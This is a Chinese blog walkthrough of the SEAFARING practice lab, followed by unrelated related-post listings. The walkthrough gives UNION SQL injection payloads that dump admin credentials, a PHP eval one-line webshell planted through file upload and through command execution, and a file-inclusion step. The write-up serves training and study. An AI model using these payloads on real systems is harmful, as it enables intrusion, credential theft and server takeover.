SEAFARING靶场漏洞攻略

已于 2024-09-13 15:56:07 修改
阅读量347 收藏 5
点赞数 13
文章标签: 安全 web安全
于 2024-09-13 15:54:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81881972/article/details/142207139
版权

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

你不要在理我了
关注
求助 MOR-Tales of seafaring
fsjcondingle的博客
02-09 371
题目大意: 小科经常会听爷爷给他讲述年轻时航海的故事,从一个港口开始航行,经过许多水路,最后到达了另一个港口,每次都能最高效地完成航行。 听多了,小科就开始怀疑爷爷是在吹牛,于是他打算写一个程序,验证爷爷谷故事中的航行能不能完成 故事场景中,有n个港口,m条水路、每条水路连接着2个港口,每个航行故事中会询问两个港口间是否有长度为d的路径(不一定是简单路径),即可以重复走一条边。 输入格式 第一行有三个整数n、m和k(2<=n<=5000, 1<=m<=5000, 1&l
BZOJ3417: Poi2013 Tales of seafaring
commonc的博客
05-31 979
题目大意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)   从a到b假如有长度为x的路径,那就可以往回走一步再往前走一步得到长度为x+2的路径 所以可以求出每对点之间的奇数长度最短路和偶数长度最短路,然后判断是否小于d即可 PS: 1.这题卡内存,所以必须离线之后一个点一个点的枚举起点算完之后重新利用内存 2.会有单点不与外界联通并查询这个单点自己之
seafaring靶场漏洞测试攻略
shw_yzh的博客
09-13 325
seafaring靶场漏洞测试攻略
seafaring靶场渗透测试
2301_81525518的博客
09-13 229
进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了。
seafaring寻找漏洞
2301_78031880的博客
09-13 236
(1)下面有一个输入框,输入ls进行查看(2)输入echo '<??>' > qxl.php 并且访问(3)写入一句话木马,并且访问蚁剑连接echo '<??>'>q.php。
SEAFARING靶场渗透
最新发布
kknifek的博客
09-13 233
??echo '<??
bzoj3137: [Baltic2013]tracks
weixin_30454481的博客
02-23 62
炸一看好像很神仙的样子,其实就是个sb题 万年不见的1A 但是我们可以反过来想,先选一个起点到终点的联通块,然后这联通块后面相当于就能够走了,继续找联通块 然后就能发现直接相邻的脚步相同的边权为0,否则边权为1 直接bfs找最深的层就完事了 #include<cstdio> #include<iostream> #include<cstring>...
[POI2013]MOR-Tales of seafaring
weixin_30586257的博客
07-10 78
题目 思博题,发现一旦路径太长我们可以来回走最后一条边,但是这样并不能改变路径长度的奇偶性 所以求一下所有点之间奇最短路和偶最短路就好了,直接暴力\(BFS\)即可 有一个烦人的特判 代码 #include<bits/stdc++.h> #define mp std::make_pair #define re register inline int read() { ...
[POI2013] MOR-Tales of seafaring
acteu20420的专栏
09-15 159
传送门 简单题意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)。即可以重复走一条边。 思路: 蛮水的叭。我们知道路径可以重复走,所以只要找到一条和d奇偶性相同的最短路,就可以做到了。 因为可以在一条边上不停来来回回,也就是在最短路上加上了一个偶数-->偶数大小任意!!!; 此处应有代码: 1 #include<bi...
gre 分类词汇,gre 分类词汇,gre 分类词汇,gre 分类词汇,
06-14
- **seafaring**:航海的,与海上旅行有关的活动。 - **piscatorial**:渔猎的,与捕鱼相关的活动。 - **hulk**:残骸,废弃或损坏严重的船只。 - **junk**:帆船,中国传统的木质帆船。 - **earing**:耳钉,一种...
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 416
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
中国海洋大学2022CTF校赛
web13618542420的博客
05-15 302
中国海洋大学2022校赛 质量总的来说还不错,类似于新生赛,偏简单,不过有些题还是很有趣的. http://github.com/tangzichengcc/The_Growth_Path_Of_A_CTFer_And_Pwner 题目的附件放在了我的github项目,有兴趣的朋友可以去做一下 被和谐了好像,在这个项目里 The_Growth_Path_Of_A_CTFer_And_Pwner 文章目录 中国海洋大学2022校赛 web very old php game 你比香农都牛逼 Baby
A Brief History of Humankind — 01 the cognitive revolution
qq_42347617的博客
05-17 2643
1. The Cognitive Revolution 1.1 An Animal of No Significance Word List: Word Interpretation Domain n.域 Kingdom n.界 Phylum n.门 Class n.纲 Order n.目 Family n.科 genus n.“属” 名 speci...
零信任安全:重新思考数字世界的访问
网络研究观
09-09 791
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 955
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1814
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1184
本文主要介绍网络安全认识与学习规划
【Authing身份云-注册安全分析报告-无验证方式导致安全隐患】
09-09 803
Authing身份云隶属于北京蒸汽记忆科技有限公司, 是专业的员工身份管理和用户身份管理服务提供商,为企业和开发者提供快速、安全的身份认证和访问管理方案。基于员工和用户身份管理,Authing 推出了单点登录、自适应多因素认证、手机号码闪验、应用集成网关、权限管理、通用登录组件、自定义数据库连接等产品。作为身份验证的厂家,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
vulhub漏洞靶场搭建
07-25
Vulhub漏洞靶场是一个面向大众的开源漏洞靶场,旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。搭建Vulhub漏洞靶场可以按照以下步骤进行操作: 1. 下载Vulhub压缩包,并上传到虚拟机的任意目录。可以使用离线安装或者Git安装两种方法中的任意一种。离线安装可以通过下载Vulhub压缩包并解压来完成,Git安装可以使用以下命令进行安装: ``` $ git clone https://github.com/vulhub/vulhub.git ``` 如果没有安装Git,需要先安装Git: ``` $ yum install -y git ``` 2. 安装Docker和Docker-Compose。可以使用以下命令进行安装: ``` $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun $ curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose $ chmod +x /usr/local/bin/docker-compose ``` 3. 运行Vulhub漏洞靶场镜像。在Vulhub目录下执行以下命令: ``` $ cd vulhub/ $ docker-compose up -d ``` 这样就完成了Vulhub漏洞靶场的搭建。你可以通过访问相应的地址和端口来进行漏洞复现和实操。请注意,搭建漏洞靶场需要一定的安全意识和技术知识,建议在合适的环境中进行操作。 #### 引用[.reference_title] - *1* [开源漏洞靶场 Vulhub环境搭建](https://blog.csdn.net/tianlang2013/article/details/123621374)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Vulhub漏洞靶场搭建](https://blog.csdn.net/m0_61869253/article/details/129649232)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值